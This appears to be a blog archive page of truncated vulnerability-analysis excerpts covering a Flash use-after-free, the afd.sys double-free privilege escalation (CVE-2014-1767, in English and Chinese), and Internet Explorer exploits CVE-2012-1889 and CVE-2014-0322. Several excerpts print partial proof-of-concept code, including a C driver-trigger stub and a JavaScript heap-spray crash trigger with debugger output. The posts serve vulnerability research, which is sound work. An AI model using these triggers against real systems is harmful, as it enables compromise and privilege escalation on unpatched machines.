分类归档 » Binary Vuln Analysis

This is my first time to analysis the flash sample. And I will show some skills and experience how to analysis the flash sample. —- (1) root cause analysis ApplicationDomain.currentDomain.domainMemory will point to a global array we defined. When we do some operation on this array, some exceptions will happened. we first compress the array, then we corrupt the array, after this, we uncompress the array, because the data in the array we changed, it will failed, and it has not notified the domainMemory, So the domainMemory still point to a old array we has free. Note: we can find the code in the avmplus(open source). —- (2) how to start First we need to find the functions in the …..

Hint: for Chinese Version, Click Me [0x00]. Introduction First, I would like to present the reasons why I would focus on this vulnerability, (1) This afd.sys dangling pointer vulnerability was named as the best privilege escalation vulnerability in pwnie awards 2014. (2) The vul type was double-free, It woulb be very interesting. (3) So far, there’s no exp codes exposed, so it’s challenging and exciting to finish one exploit.. OK, now let’s go to our work, our experiment OS is Windows 7(6.1.7601) 32 bit. [0x01]. Vulnerability Root cause analysis A. poc overview Our most important reference was the paper : http://www.siberas.de/papers/Pwn2Own_2014_AFD.sys_privilege_escalation.pdf, from the description of paper, we can get our poc as follows: ================================================= #include <windows.h> #include <stdio.h> #pragma comment(lib, …..

Hint: Click Me for English Version [0x00].简介   首先想说的是,之所以分析这个漏洞有几个原因,(1)据载此漏洞在’2014黑客奥斯卡奖Pwnie Awards’中被评为最佳提权漏洞之首(AFD.sys Dangling Pointer Vulnerability (CVE-2014-1767))。(2) 这个漏洞是一个double free类型漏洞,比较有意思 (3) 迄今只有老外发了一份writeup讲解思路,还没有成功的exp放出,有的探索。本文会从poc开始在windows7 x86平台进行漏洞的原理分析以及实现一个尽量完善的提权利用:)。 [0x01]. 漏洞原理分析 A. 初窥 我们最权威也是最给力的参考资料就是下面的这个PDF文件。 http://www.siberas.de/papers/Pwn2Own_2014_AFD.sys_privilege_escalation.pdf 我们根据pdf的描述得到以下poc。本实验所有操作都在windows 7 (6.1.7601) 32位系统上完成。 ================================================= #include <windows.h> #include <stdio.h> #pragma comment(lib, “WS2_32.lib”)   int main() {     DWORD targetSize = 0×310 ;     DWORD virtualAddress = 0×13371337 ;     DWORD mdlSize=(0×4000*(targetSize-0×30)/8)-0xFFF-(virtualAddress& 0xFFF) ;     static DWORD inbuf1[100] ;     memset(inbuf1, 0, sizeof(inbuf1)) ;     inbuf1[6]  = virtualAddress ;     inbuf1[7]  = mdlSize ;     inbuf1[10] = 1 ;     static DWORD inbuf2[100] ;     memset(inbuf2, 0, sizeof(inbuf2)) ;     inbuf2[0] = 1 ;     inbuf2[1] = 0x0AAAAAAA ;     WSADATA      WSAData ;     SOCKET       s ;     sockaddr_in  sa ;     int          ierr ;     …..

Hi, this is a IE exploit sample. I found this in the vt. https://www.virustotal.com/en/file/1df80150284800e82b1dd64579aae71ebce2f6fd44ea37e4c83af287502452ee/analysis/ But I see the detection radio is so low, 12 / 51. many vendor can’t detect this sample. From the vt tag, it seems CVE-2012-1889, and it really an old vulnerability. We also can find the exploit code here: https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/browser/msxml_get_definition_code_exec.rb Now Let’s look through this sample The poc code is like following: <script type=”text/javascript”>// <![CDATA[ var obj=document.getElementById('puZz').object; var src=unescape("%"+"u0c08"+"%"+"u0c0c"); while(src.length<0x1002)src+=src; src="\\\\xxx"+src; src=src.substr(0,0x1000-10); var pic=document.createElement("img"); pic.src=src; pic.nameProp; obj['definition'](1000); // ]]></script> Now we load the poc in the IE. It crashed. (90c.76c): Access violation – code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=0c0c0c08 ebx=00000000 ecx=5dda5dfc …..

Yesterday, fireeye has posted a blog about a new 0day attack. (http://www.fireeye.com/blog/technical/cyber-exploits/2014/02/new-ie-zero-day-found-in-watering-hole-attack-2.html) (http://www.fireeye.com/blog/uncategorized/2014/02/operation-snowman-deputydog-actor-compromises-us-veterans-of-foreign-wars-website.html). This 0day is affected IE 10, and has been assigned as CVE-2014-0322, and it can be used to ATP attack. We can find the sample here: http://jsunpack.jeek.org/?report=a7d85dd462456a816b1ebc8306550e0c9b61c75e